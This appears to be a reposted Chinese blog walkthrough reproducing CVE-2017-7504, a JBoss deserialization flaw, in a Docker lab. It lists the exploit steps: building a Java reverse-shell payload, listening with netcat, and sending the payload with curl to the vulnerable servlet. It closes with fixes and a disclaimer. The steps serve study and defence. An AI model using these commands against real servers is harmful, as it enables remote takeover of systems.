CVE-2017-7504 JBOSS反序列化漏洞复现

admin 2024年12月4日22:08:49评论3 views字数 1263阅读4分12秒阅读模式

一、漏洞描述

  JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。

二、漏洞环境搭建

需要使用的工具如下

1.docker+vulhub漏洞库
2.漏洞POC:下载链接https://github.com/joaomatosf/JavaDeserH2HC
3.攻击机kali虚拟机(版本随意)
4.靶机Ubuntu18.04虚拟机(其他也可以)

打开Ubuntu虚拟机,有docker环境和vulhub漏洞库的话就直接进入环境,没有的话先安装docker和下载vulhub漏洞库(网上教程很多,这里就不多介绍了)

root@admin666-virtual-machine:~/vulhub-master/jboss/CVE-2017-7504#

执行命令

root@admin666-virtual-machine:~/vulhub-master/jboss/CVE-2017-7504# docker-compose up -d

等到出现以下页面说明已经搭建完成
CVE-2017-7504 JBOSS反序列化漏洞复现可以访问http://your-ip:8080,出现如下页面证明环境搭建成功!
CVE-2017-7504 JBOSS反序列化漏洞复现

存在漏洞页面

/jbossmq-httpil/HTTPServerILServlet
CVE-2017-7504 JBOSS反序列化漏洞复现
image.png

三、漏洞利用

进入kali利用漏洞POC进行验证

1、先把POC克隆到kali中,执行命令

git clone https://github.com/joaomatosf/JavaDeserH2HC
CVE-2017-7504 JBOSS反序列化漏洞复现

2、进入JavaDeserH2HC目录,执行

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
CVE-2017-7504 JBOSS反序列化漏洞复现

3、设置接收shell的IP和端口

java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 攻击机IP:监听端口
CVE-2017-7504 JBOSS反序列化漏洞复现

4、使用nc监听端口

nc -lvvp 监听端口
CVE-2017-7504 JBOSS反序列化漏洞复现

5、用攻击机发送payload,在JavaDeserH2HC目录下执行

curl http://192.168.1.17:8080/jbossmq-httpil/HTTPServerILServlet  --data-binary @ReverseShellCommonsCollectionsHashMap.ser
CVE-2017-7504 JBOSS反序列化漏洞复现

6、查看监听端口返回的shell,可以执行命令,至此漏洞验证完成

CVE-2017-7504 JBOSS反序列化漏洞复现CVE-2017-7504 JBOSS反序列化漏洞复现

7、关闭docker环境

docker-compose down
CVE-2017-7504 JBOSS反序列化漏洞复现

漏洞修复

1、升级jboss为高版本

2、删除**/jbossmq-httpil/HTTPServerILServlet**接口

所有文章,仅供安全研究与学习之用,后果自负!

原文始发于微信公众号(网安知识库):CVE-2017-7504 JBOSS反序列化漏洞复现

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月4日22:08:49
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2017-7504 JBOSS反序列化漏洞复现https://cn-sec.com/archives/3466668.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息